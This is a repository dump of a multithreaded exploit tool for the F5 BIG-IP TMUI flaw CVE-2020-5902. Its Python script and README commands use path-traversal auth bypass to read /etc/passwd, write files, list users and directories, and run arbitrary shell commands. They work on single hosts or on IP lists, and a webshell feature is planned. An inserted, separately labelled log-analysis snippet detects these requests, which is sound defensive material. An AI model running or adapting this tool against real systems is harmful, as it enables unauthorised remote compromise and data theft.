├── 1-2-f5.txt
├── LICENSE
├── README.md
├── batch_check_result
└── 20200712175217
│ └── success.txt
├── batch_hsqldb_auth_bypass_result
└── 20200709162928
│ └── success.txt
├── batch_rce_result
└── 20200708103305
│ └── success.txt
├── f5-bigip-rce-cve-2020-5902.py
└── img
├── f5rce00.png
├── f5rce01.png
├── f5rce02.png
├── f5rce03.png
├── f5rce04.png
├── f5rce05.png
├── f5rce06.png
├── f5rce07.png
├── f5rce08.png
├── f5rce09.png
└── f5rce10.png
/1-2-f5.txt:
--------------------------------------------------------------------------------
1 | https://15.19.18.21
2 | https://3.1.5.25
3 | https://4.8.2.10
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2020 LSA
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | F5 BIG-IP RCE (CVE-2020-5902) vulnerability detection tool
2 | ==
3 |
4 |
5 | # Summary
6 |
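7 | On 20200706, an F5 BIG-IP TMUI RCE vulnerability was disclosed publicly.
8 |
9 | The TMUI component (Traffic Management User Interface) of F5 BIG-IP has an authentication bypass vulnerability. It arises because the URL as parsed by Tomcat differs from what request.getPathInfo() returns, so the permission check can be bypassed and every function of the TMUI module can be reached without authorization, which in turn allows arbitrary file read/write, command execution, and so on.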
10 |
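The parsing difference described above leaves a recognizable trace in web access logs. The following is an added example, not part of this repository: a log triage helper that flags the `..;` path segment and the `/hsqldb;` and `/hsqldb%0a` suffixes this script requests. It assumes combined log format; the sample lines are constructed, and `container_view` is a simplified model of container-side path normalization, not Tomcat's own code.

```python
import re
from urllib.parse import unquote

# Constructed sample lines (combined log format, documentation address ranges).
SAMPLE_LOG = """\
192.0.2.10 - - [06/Jul/2020:10:01:02 +0000] "GET /tmui/login.jsp HTTP/1.1" 200 4321 "-" "Mozilla/5.0"
192.0.2.66 - - [06/Jul/2020:10:01:05 +0000] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1" 200 1890 "-" "Opera/9.80"
192.0.2.66 - - [06/Jul/2020:10:01:09 +0000] "POST /tmui/login.jsp/..%3b/tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1" 200 77 "-" "Opera/9.80"
192.0.2.70 - - [06/Jul/2020:10:02:00 +0000] "GET /hsqldb%0a HTTP/1.1" 200 512 "-" "curl/7.68.0"
192.0.2.71 - - [06/Jul/2020:10:02:30 +0000] "GET /hsqldb; HTTP/1.1" 401 0 "-" "curl/7.68.0"
198.51.100.5 - - [06/Jul/2020:10:03:00 +0000] "GET /tmui/tmui/system/user/list.jsp HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
DOTDOT_PARAM = re.compile(r'/\.\.;[^/]*(?:/|$)')  # a "..;" path segment
HSQLDB_SUFFIX = re.compile(r'^/hsqldb[;\n]')       # "/hsqldb;" or decoded "/hsqldb%0a"


def decode_fully(path, rounds=3):
    """Percent-decode repeatedly so %3b and %253b both surface as ';'."""
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def container_view(path):
    """Simplified model (assumption): drop ';params' from every segment,
    then resolve '.' and '..', to show which resource the request reaches."""
    out = []
    for seg in path.split("/"):
        seg = seg.split(";", 1)[0]
        if seg == "..":
            if out:
                out.pop()
        elif seg not in ("", "."):
            out.append(seg)
    return "/" + "/".join(out)


def analyze(log_text):
    """Return one finding per log line whose request path matches a rule."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line
        src, method, target, status = m.group(1), m.group(2), m.group(3), int(m.group(4))
        path = decode_fully(target.split("?", 1)[0])
        if DOTDOT_PARAM.search(path):
            rule, resolved = "dotdot-semicolon", container_view(path)
        elif HSQLDB_SUFFIX.search(path):
            rule, resolved = "hsqldb-suffix", "/hsqldb"
        else:
            continue
        findings.append({
            "src": src, "method": method, "rule": rule,
            "resolved": resolved, "status": status,
            # The script treats HTTP 200 as success, so 200 here deserves priority.
            "answered_200": status == 200,
        })
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f)
```

A flagged request that was answered with 200 indicates the front end served the protected resource and should be triaged first; other status codes still record a probe.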
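11 | For details, see [F5 BIG-IP TMUI RCE vulnerability (CVE-2020-5902): reproduction and points to note](https://www.lsablog.com/networksec/penetration/f5-bigip-tmui-rce-cve-2020-5902-reproduce/)
12 |
13 | This tool supports single-IP and batch-IP checks, and can perform file read/write, list auth users, list directories, remote command execution, and hsqldb authentication bypass checks.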
14 |
15 |
16 | # Quick start
17 |
18 | pip install requests
19 |
20 |
21 | ## help
22 |
23 | python f5-bigip-rce-cve-2020-5902.py -h
24 |
25 | 
26 |
27 | ## poc check
28 |
29 | python f5-bigip-rce-cve-2020-5902.py -u "https://1.2.3.4" --check
30 |
31 | 
32 |
33 | ## batch poc check
34 |
35 | python f5-bigip-rce-cve-2020-5902.py -f 1-2-f5.txt --check -t 20 -s 10
36 |
37 | 
38 |
39 | ## read file
40 |
41 | python f5-bigip-rce-cve-2020-5902.py -u "https://1.2.3.4" --fileread "/etc/passwd"
42 |
43 | 
44 |
45 | ## save file
46 |
47 | python f5-bigip-rce-cve-2020-5902.py -u "https://1.2.3.4" --filepath "/tmp/xxx.txt" --filecontent "x"
48 |
49 | 
50 |
51 | ## list auth user
52 |
53 | python f5-bigip-rce-cve-2020-5902.py -u "https://1.2.3.4" --list-users
54 |
55 | 
56 |
57 | ## list directory
58 |
59 | python f5-bigip-rce-cve-2020-5902.py -u "https://1.2.3.4" --listdir "/tmp/"
60 |
61 | 
62 |
63 | ## RCE
64 |
65 | python f5-bigip-rce-cve-2020-5902.py -u "https://1.2.3.4" --rce id --still-exploit
66 |
67 | 
68 |
69 | ## batch RCE
70 |
71 | python f5-bigip-rce-cve-2020-5902.py -f 1-2-f5.txt --rce whoami --still-exploit -s 15 -t 20
72 |
73 | 
74 |
75 |
76 | ## hsqldb bypass check
77 |
78 | python f5-bigip-rce-cve-2020-5902.py -u "https://1.2.3.4" --bypass-hsqldb
79 |
80 | 
81 |
82 | ## batch hsqldb bypass check
83 |
84 | python f5-bigip-rce-cve-2020-5902.py -f 1-2-f5.txt --bypass-hsqldb
85 |
86 | 
87 |
88 |
89 | # Note
90 |
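91 | **For batch IPs, add http:\/\/ or https:\/\/ at the start where possible; if no scheme is given, http:\/\/ is added by default.**
92 |
93 | Where conditions allow, adding the --still-exploit parameter is recommended: RCE is attempted even if list auth user fails, which increases the success rate.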
94 |
95 |
96 | # TODO
97 |
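98 | 1. Send requests multiple times to raise the batch success rate; the efficiency trade-off needs to be weighed
99 |
100 | 2. Integrate exploitation of the hsqldb interface deserialization
101 |
102 | 3. Add automated webshell writing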
103 |
104 |
105 | # Feedback
106 | [issues](https://github.com/theLSA/f5-bigip-rce-cve-2020-5902/issues)
107 |
108 | [lsablog](https://www.lsablog.com/networksec/penetration/f5-bigip-tmui-rce-cve-2020-5902-reproduce/)
109 |
110 | gmail:lsasguge196@gmail.com
111 |
112 | qq:2894400469@qq.com
113 |
--------------------------------------------------------------------------------
/batch_check_result/20200712175217/success.txt:
--------------------------------------------------------------------------------
1 | success result here
2 |
--------------------------------------------------------------------------------
/batch_hsqldb_auth_bypass_result/20200709162928/success.txt:
--------------------------------------------------------------------------------
1 | success result here
--------------------------------------------------------------------------------
/batch_rce_result/20200708103305/success.txt:
--------------------------------------------------------------------------------
1 | success result here
--------------------------------------------------------------------------------
/f5-bigip-rce-cve-2020-5902.py:
--------------------------------------------------------------------------------
1 | #coding:utf-8
2 | #Author:LSA
3 | #Date:20200707
4 | #Description:f5-bigip-rce-cve-2020-5902,fileRead+fileSave+tmshCmd+hsqldb auth bypass
5 |
6 |
7 |
8 | import requests
9 | import optparse
10 | import sys
11 | import json
12 | import os
13 | import threading
14 | import Queue
15 | import datetime
16 |
17 | reload(sys)
18 | sys.setdefaultencoding('utf-8')
19 |
20 | from requests.packages.urllib3.exceptions import InsecureRequestWarning
21 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
22 |
23 |
24 | headers = {"User-Agent": "Opera/9.80 (Windows NT 6.1; U; en) Presto/2.8.131 Version/11.11", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Accept-Language": "en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7"}
25 |
26 |
27 | lock = threading.Lock()
28 |
29 | q0 = Queue.Queue()
30 | threadList = []
31 |
32 | succ = 0
33 |
34 |
35 |
36 |
37 | def f5FileRead(tgtIP,fileRead,timeout):
38 |
39 |
40 | tgtUrl = tgtIP + '/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=' + fileRead
41 |
42 |
43 | fileReadRsp = requests.get(tgtUrl, headers=headers, timeout=timeout, verify=False)
44 |
45 | return fileReadRsp
46 |
47 |
48 |
49 |
50 |
51 | def f5FileSave(tgtIP,timeout,filePath,fileContent='null'):
52 |
53 | tgtUrl = tgtIP + '/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp'
54 |
55 | fileData = {"fileName": filePath, "content": fileContent} #md5(check-CVE-2020-5902-xxx)
56 |
57 |
58 | fileSaveRsp = requests.post(tgtUrl,headers=headers,data=fileData,timeout=timeout,verify=False)
59 |
60 | if fileSaveRsp.status_code == 200:
61 | fileReadRsp = f5FileRead(tgtIP,filePath,timeout)
62 | if fileContent in fileReadRsp.text:
63 | print filePath + ' saved successfully'
64 | else:
65 | print filePath + ' seems to have saved,but f5FileRead return content not right,please check manually.'
66 | return True
67 |
68 | else:
69 | print str(fileSaveRsp.status_code) + '\n' + fileSaveRsp.text
70 | print filePath + ' seems to have saved,but fileSaveRspStatusCode or fileSaveRspText return content not right,please check manually.'
71 | return False
72 |
73 |
74 | def f5ListAuthUsers(tgtIP,timeout):
75 | tgtUrl = tgtIP + '/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user'
76 | f5ListAuthUserRsp = requests.get(tgtUrl,headers=headers,timeout=timeout,verify=False)
77 |
78 |
79 | if f5ListAuthUserRsp.status_code == 200:
80 | if (f5ListAuthUserRsp.json()['error'] == "") and (f5ListAuthUserRsp.json()['output'] != ""):
81 | print f5ListAuthUserRsp.json()
82 | print 'list auth users successfully!'
83 | return True
84 | else:
85 | print f5ListAuthUserRsp.json()
86 | print 'list auth users failed'
87 | return False
88 | else:
89 | print str(f5ListAuthUserRsp.status_code)
90 | print 'list auth users failed.'
91 | return False
92 |
93 |
94 | def f5ListDirectory(tgtIP,f5Directory,timeout):
95 | tgtUrl = tgtIP + '/tmui/login.jsp/..;/tmui/locallb/workspace/directoryList.jsp?directoryPath=' + f5Directory
96 |
97 |
98 | f5DirectoryListRsp = requests.get(tgtUrl, headers=headers, timeout=timeout, verify=False)
99 |
100 | print str(f5DirectoryListRsp.status_code) + '\n' + f5DirectoryListRsp.text.strip()
101 |
102 |
103 |
104 |
105 | def f5rce(tgtIP,rce,timeout,stillExploitFlag):
106 |
107 | f5lau = f5ListAuthUsers(tgtIP,timeout)
108 |
109 | if f5lau or stillExploitFlag:
110 |
111 |
112 | if tgtIP.startswith(("http", "https")):
113 | tgtUrl = tgtIP + '/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp'
114 | else:
115 | tgtUrl = "http://" + tgtIP + '/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp'
116 |
117 | tmshcmdData0 = {"command": "create cli alias private list command bash"}
118 | tmshcmdData1 = {"command": "list /tmp/xtx.txt"}
119 | tmshcmdData2 = {"command": "delete cli alias private list"}
120 |
121 | f5rceRsp0 = requests.post(tgtUrl, headers=headers, data=tmshcmdData0, timeout=timeout, verify=False)
122 |
123 |
124 | if f5rceRsp0.status_code == 200 and f5rceRsp0.json()['error'] == "":
125 | print 'Successfully created alias list=bash'
126 |
127 | f5RceFilePath = '/tmp/xtx.txt'
128 | f5RceFileContent = rce
129 |
130 | f5FileSaveReturn = f5FileSave(tgtIP,timeout,f5RceFilePath,f5RceFileContent)
131 |
132 | if f5FileSaveReturn:
133 |
134 | f5rceRsp1 = requests.post(tgtUrl,headers=headers,data=tmshcmdData1,timeout=timeout, verify=False)
135 |
136 | if f5rceRsp1.status_code == 200 and f5rceRsp1.json()['error'] == "":
137 | print 'rce seems to have succeed,result:\n' + f5rceRsp1.text.strip()
138 |
139 | else:
140 | print 'rce failed,result status_code:' + str(f5rceRsp1.status_code) + '\n' + f5rceRsp1.text.strip()
141 |
142 | f5rceRsp2 = requests.post(tgtUrl,headers=headers,data=tmshcmdData2,timeout=timeout, verify=False)
143 | if f5rceRsp2.status_code == 200 and f5rceRsp2.json()['error'] == "":
144 | print 'Successfully deleted alias list=bash'
145 | else:
146 | print 'Failed to delete alias list=bash'
147 |
148 | f5RceFileContentToReplace = 'null'
149 |
150 | f5FileSaveReturn1 = f5FileSave(tgtIP,timeout,f5RceFilePath,f5RceFileContentToReplace)
151 |
152 | if f5FileSaveReturn1:
153 | print 'f5FileSave replaced successfully'
154 | else:
155 | print 'f5FileSave replace failed'
156 | successInfo = []
157 | successInfo.append(tgtIP)
158 | successInfo.append('[listAuthUser:' + str(f5lau) + ']')
159 |
160 |
161 | successInfo.append(f5rceRsp1.json())
162 | print successInfo
163 | return successInfo
164 |
165 |
166 | else:
167 | print 'f5FileSave failed'
168 |
169 | return False
170 |
171 |
172 | else:
173 | print 'Created alias list=bash failed'
174 | return False
175 | else:
176 | print 'Exploit stopped because f5ListAuthUsers and stillExploitFlag both False.If want to exploit anyway,please use --still-exploit'
177 | return False
178 |
179 |
180 |
181 | def f5rce_batch(rce,timeout,f4success,stillExploitFlag):
182 | global countLines
183 | while(not q0.empty()):
184 | tgtIP = q0.get()
185 |
186 | qcount = q0.qsize()
187 |
188 | print 'Exploiting-' + tgtIP + '---------------[' + str(countLines - qcount) + ']'
189 |
190 | try:
191 | returnSuccessInfo = f5rce(tgtIP,rce,timeout,stillExploitFlag)
192 |
193 |
194 |
195 | if returnSuccessInfo == False:
196 | continue
197 |
198 |
199 | if ('True' in returnSuccessInfo[1]) or (returnSuccessInfo[2]['output'] != ""):
200 | lock.acquire()
201 | f4success.write(str(returnSuccessInfo)+'\n')
202 | lock.release()
203 | global succ
204 | succ = succ + 1
205 | else:
206 | continue
207 |
208 | except:
209 | print "Caused exception,continue next"
210 | continue
211 |
212 |
213 |
214 | def f5HsqldbAuthBypass(tgtIP,timeout):
215 |
216 | urlBypass0 = tgtIP + '/hsqldb;'
217 |
218 | hsqldbRsp = requests.get(urlBypass0, headers=headers,timeout=timeout,verify=False)
219 |
220 | if ('HSQL Database Engine' in hsqldbRsp.text) and (hsqldbRsp.status_code == 200):
221 | print 'Use [/hsqldb;] bypass auth successfully'
222 | print hsqldbRsp.text
223 | #return True
224 | returnF5HsqldbAuthBypassInfo = tgtIP + '/hsqldb;'
225 | return returnF5HsqldbAuthBypassInfo
226 | else:
227 | urlBypass1 = tgtIP + '/hsqldb%0a'
228 |
229 | hsqldbRsp1 = requests.get(urlBypass1, headers=headers,timeout=timeout,verify=False)
230 |
231 | if ('HSQL Database Engine' in hsqldbRsp1.text) and (hsqldbRsp1.status_code == 200):
232 | print 'Use [/hsqldb%0a] bypass auth successfully'
233 | print hsqldbRsp1.text
234 | #return True
235 | returnF5HsqldbAuthBypassInfo = tgtIP + '/hsqldb%0a'
236 | return returnF5HsqldbAuthBypassInfo
237 | else:
238 | print 'bypass hsqldb failed'
239 | print str(hsqldbRsp.status_code)
240 | print hsqldbRsp.text
241 | return False
242 |
243 |
244 |
245 | def f5HsqldbAuthBypassBatch(timeout,f4success):
246 |
247 | global countLines1
248 | while(not q0.empty()):
249 | tgtIP = q0.get()
250 |
251 | qcount = q0.qsize()
252 |
253 | print 'Checking[hsqldb]-' + tgtIP + '---------------[' + str(countLines1 - qcount) + ']'
254 |
255 | try:
256 | f5HsqldbAuthBypassReturn = f5HsqldbAuthBypass(tgtIP,timeout)
257 |
258 | except:
259 | print "Caused exception,continue next"
260 | continue
261 |
262 | #if f5HsqldbAuthBypassReturn == True:
263 | if f5HsqldbAuthBypassReturn:
264 | lock.acquire()
265 | #f4success.write(tgtIP+'\n')
266 | f4success.write(f5HsqldbAuthBypassReturn+'\n')
267 | lock.release()
268 | global succ
269 | succ = succ + 1
270 |
271 |
272 | else:
273 | continue
274 |
275 |
276 |
277 | def f5BypassAuthCheck(tgtIP,timeout):
278 |
279 | poc0 = '/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=test5902'
280 | poc1 = '/tmui/login.jsp/..;/tmui/system/user/authproperties.jsp'
281 |
282 | tgtUrl0 = tgtIP + poc0
283 | tgtUrl1 = tgtIP + poc1
284 |
285 | try:
286 |
287 | f5BypassAuthCheckRsp0 = requests.get(tgtUrl0, headers=headers, timeout=timeout, verify=False)
288 |
289 |
290 | if (f5BypassAuthCheckRsp0.status_code == 200 and 'test5902' in f5BypassAuthCheckRsp0.text):
291 | print '[POC0]' + tgtIP + ' is vulnerable!!!'
292 | return True
293 |
294 | else:
295 | f5BypassAuthCheckRsp1 = requests.get(tgtUrl1, headers=headers, timeout=timeout, verify=False)
296 |
297 | if f5BypassAuthCheckRsp1.status_code == 200:
298 | print '[POC1]' + tgtIP + ' is vulnerable!!!'
299 | return True
300 |
301 | except:
302 | print 'Caused exceptions,check stopped,please check it manually\n'
303 | return False
304 |
305 |
306 | print tgtIP + ' is not vulnerable'
307 | return False
308 |
309 |
310 |
311 | def f5BypassAuthCheckBatch(timeout,f4success):
312 |
313 | global countLines2
314 | while(not q0.empty()):
315 | tgtIP = q0.get()
316 |
317 | qcount = q0.qsize()
318 |
319 | print 'Checking-' + tgtIP + '---------------[' + str(countLines2 - qcount) + ']'
320 |
321 | try:
322 | f5BypassAuthCheckReturn = f5BypassAuthCheck(tgtIP,timeout)
323 |
324 | except:
325 | print "Caused exception,continue next"
326 | continue
327 |
328 | #if f5HsqldbAuthBypassReturn == True:
329 | if f5BypassAuthCheckReturn:
330 | lock.acquire()
331 | #f4success.write(tgtIP+'\n')
332 | f4success.write(tgtIP+'\n')
333 | lock.release()
334 | global succ
335 | succ = succ + 1
336 |
337 |
338 | else:
339 | continue
340 |
341 |
342 |
343 | if __name__ == '__main__':
344 |
345 | print '''
346 |
347 | **********************************************************
348 | * F5-BIGIP-RCE-CVE-2020-5902 *
349 | * (fileRead.jsp+fileSave.jsp+tmshCmd.jsp+hsqldb) *
350 | * Coded By LSA *
351 | **********************************************************
352 |
353 | '''
354 |
355 | parser = optparse.OptionParser('python %prog ' + '-h(manual)', version='%prog v1.0')
356 |
357 | parser.add_option('-u', dest='tgtIP', type='string', help='input the single target(IP)')
358 | parser.add_option('--fileread', dest='fileRead', type='string', help='read the local file(such as /etc/passwd)')
359 | parser.add_option('-s', dest='timeout', type='int', default=7, help='timeout(7 seconds default)')
360 | parser.add_option('--rce', dest='rce', type='string', help='input the command to execute')
361 | parser.add_option('--filepath', dest='filePath', type='string', help='input the save file path')
362 | parser.add_option('--filecontent', dest='fileContent', type='string', help='input the save file content')
363 | parser.add_option('--list-users', dest='listUsers', action='store_true', help="list auth users")
364 | parser.add_option('--still-exploit', dest='stillExploit', action='store_true', help='still exploit although f5ListAuthUsers return False')
365 | parser.add_option('--listdir', dest='listDir', type='string', help='list directory path')
366 | parser.add_option('-f', dest='tgtIPsPath', type='string', help='target ips file')
367 | parser.add_option('-t', dest='threads', type='int', default=5, help='the number of threads')
368 | parser.add_option('--bypass-hsqldb',dest='bypassHsqldb',action='store_true',help='check /hsqldb auth bypass')
369 | parser.add_option('--check',dest='checkBypassAuth',action='store_true',help='use poc0 and poc1 to check')
370 |
371 | (options, args) = parser.parse_args()
372 |
373 | tgtIP = options.tgtIP
374 |
375 | if tgtIP:
376 | if tgtIP.startswith(("http", "https")) == False:
377 | tgtIP = 'http://' + tgtIP
378 |
379 |
380 | timeout = options.timeout
381 | fileRead = options.fileRead
382 |
383 | filePath = options.filePath
384 | fileContent = options.fileContent
385 |
386 | listUsers = options.listUsers
387 |
388 | stillExploit = options.stillExploit
389 |
390 | rce = options.rce
391 |
392 | #threads = options.threads
393 |
394 | listDir = options.listDir
395 |
396 | bypassHsqldb = options.bypassHsqldb
397 |
398 | checkBypassAuth = options.checkBypassAuth
399 |
400 | if stillExploit:
401 | stillExploitFlag = 1
402 | else:
403 | stillExploitFlag = 0
404 |
405 |
406 | if tgtIP and fileRead:
407 | f5FileReadRsp = f5FileRead(tgtIP,fileRead,timeout)
408 | print str(f5FileReadRsp.status_code) + '\n' + f5FileReadRsp.text.strip()
409 | sys.exit()
410 |
411 | if tgtIP and filePath and fileContent:
412 | f5FileSave(tgtIP,timeout,filePath,fileContent)
413 | sys.exit()
414 |
415 | if tgtIP and listUsers:
416 | f5ListAuthUsers(tgtIP,timeout)
417 | sys.exit()
418 |
419 |
420 | if tgtIP and rce:
421 | f5rce(tgtIP,rce,timeout,stillExploitFlag)
422 | sys.exit()
423 |
424 | if tgtIP and listDir:
425 | f5ListDirectory(tgtIP,listDir,timeout)
426 | sys.exit()
427 |
428 | if options.tgtIPsPath and rce:
429 | tgtIPsPath = options.tgtIPsPath
430 | threads = options.threads
431 | nowtime = datetime.datetime.now().strftime('%Y%m%d%H%M%S')
432 | os.mkdir('batch_rce_result/'+str(nowtime))
433 | f4success = open('batch_rce_result/'+str(nowtime)+'/'+'success.txt','w')
434 | #f4fail = open('batch_result/'+str(nowtime)+'/'+'fail.txt','w')
435 | ipsFile = open(tgtIPsPath)
436 | #global countLines
437 | countLines = len(open(tgtIPsPath,'rU').readlines())
438 |
439 | print '===Total ' + str(countLines) + ' urls==='
440 |
441 | for ips in ipsFile:
442 | ips = ips.strip()
443 | if ips.startswith(("http", "https")) == False:
444 | ips = 'http://' + ips
445 | q0.put(ips)
446 | for thread in range(threads):
447 | t = threading.Thread(target=f5rce_batch,args=(rce,timeout,f4success,stillExploitFlag))
448 | t.start()
449 | threadList.append(t)
450 | for th in threadList:
451 | th.join()
452 |
453 |
454 | print '\n###Finished! [success/total]: ' + '[' + str(succ) + '/' + str(countLines) + ']###'
455 | print 'Results were saved in ./batch_rce_result/' + str(nowtime) + '/'
456 | f4success.close()
457 |
458 | if tgtIP and bypassHsqldb:
459 | f5HsqldbAuthBypass(tgtIP,timeout)
460 |
461 | if options.tgtIPsPath and bypassHsqldb:
462 | tgtIPsPath = options.tgtIPsPath
463 | threads = options.threads
464 | nowtime = datetime.datetime.now().strftime('%Y%m%d%H%M%S')
465 | os.mkdir('batch_hsqldb_auth_bypass_result/'+str(nowtime))
466 | f4success = open('batch_hsqldb_auth_bypass_result/'+str(nowtime)+'/'+'success.txt','w')
467 | #f4fail = open('batch_result/'+str(nowtime)+'/'+'fail.txt','w')
468 | ipsFile = open(tgtIPsPath)
469 | #global countLines1
470 | countLines1 = len(open(tgtIPsPath,'rU').readlines())
471 |
472 | print '===Total ' + str(countLines1) + ' urls==='
473 |
474 | for ips in ipsFile:
475 | ips = ips.strip()
476 | if ips.startswith(("http", "https")) == False:
477 | ips = 'http://' + ips
478 | q0.put(ips)
479 | for thread in range(threads):
480 | t = threading.Thread(target=f5HsqldbAuthBypassBatch,args=(timeout,f4success))
481 | t.start()
482 | threadList.append(t)
483 | for th in threadList:
484 | th.join()
485 |
486 |
487 | print '\n###Finished! [success/total]: ' + '[' + str(succ) + '/' + str(countLines1) + ']###'
488 | print 'Results were saved in ./batch_hsqldb_auth_bypass_result/' + str(nowtime) + '/'
489 | f4success.close()
490 |
491 |
492 | if tgtIP and checkBypassAuth:
493 | f5BypassAuthCheck(tgtIP,timeout)
494 |
495 | if options.tgtIPsPath and checkBypassAuth:
496 | tgtIPsPath = options.tgtIPsPath
497 | threads = options.threads
498 | nowtime = datetime.datetime.now().strftime('%Y%m%d%H%M%S')
499 | os.mkdir('batch_check_result/'+str(nowtime))
500 | f4success = open('batch_check_result/'+str(nowtime)+'/'+'success.txt','w')
501 | #f4fail = open('batch_result/'+str(nowtime)+'/'+'fail.txt','w')
502 | ipsFile = open(tgtIPsPath)
503 | #global countLines2
504 | countLines2 = len(open(tgtIPsPath,'rU').readlines())
505 |
506 | print '===Total ' + str(countLines2) + ' urls==='
507 |
508 | for ips in ipsFile:
509 | ips = ips.strip()
510 | if ips.startswith(("http", "https")) == False:
511 | ips = 'http://' + ips
512 | q0.put(ips)
513 | for thread in range(threads):
514 | t = threading.Thread(target=f5BypassAuthCheckBatch,args=(timeout,f4success))
515 | t.start()
516 | threadList.append(t)
517 | for th in threadList:
518 | th.join()
519 |
520 |
521 | print '\n###Finished! [success/total]: ' + '[' + str(succ) + '/' + str(countLines2) + ']###'
522 | print 'Results were saved in ./batch_check_result/' + str(nowtime) + '/'
523 | f4success.close()
524 |
--------------------------------------------------------------------------------
/img/f5rce00.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/theLSA/f5-bigip-rce-cve-2020-5902/0b30b709405436f87362abe6b75b705a80bf545d/img/f5rce00.png
--------------------------------------------------------------------------------
/img/f5rce01.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/theLSA/f5-bigip-rce-cve-2020-5902/0b30b709405436f87362abe6b75b705a80bf545d/img/f5rce01.png
--------------------------------------------------------------------------------
/img/f5rce02.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/theLSA/f5-bigip-rce-cve-2020-5902/0b30b709405436f87362abe6b75b705a80bf545d/img/f5rce02.png
--------------------------------------------------------------------------------
/img/f5rce03.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/theLSA/f5-bigip-rce-cve-2020-5902/0b30b709405436f87362abe6b75b705a80bf545d/img/f5rce03.png
--------------------------------------------------------------------------------
/img/f5rce04.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/theLSA/f5-bigip-rce-cve-2020-5902/0b30b709405436f87362abe6b75b705a80bf545d/img/f5rce04.png
--------------------------------------------------------------------------------
/img/f5rce05.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/theLSA/f5-bigip-rce-cve-2020-5902/0b30b709405436f87362abe6b75b705a80bf545d/img/f5rce05.png
--------------------------------------------------------------------------------
/img/f5rce06.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/theLSA/f5-bigip-rce-cve-2020-5902/0b30b709405436f87362abe6b75b705a80bf545d/img/f5rce06.png
--------------------------------------------------------------------------------
/img/f5rce07.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/theLSA/f5-bigip-rce-cve-2020-5902/0b30b709405436f87362abe6b75b705a80bf545d/img/f5rce07.png
--------------------------------------------------------------------------------
/img/f5rce08.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/theLSA/f5-bigip-rce-cve-2020-5902/0b30b709405436f87362abe6b75b705a80bf545d/img/f5rce08.png
--------------------------------------------------------------------------------
/img/f5rce09.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/theLSA/f5-bigip-rce-cve-2020-5902/0b30b709405436f87362abe6b75b705a80bf545d/img/f5rce09.png
--------------------------------------------------------------------------------
/img/f5rce10.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/theLSA/f5-bigip-rce-cve-2020-5902/0b30b709405436f87362abe6b75b705a80bf545d/img/f5rce10.png
--------------------------------------------------------------------------------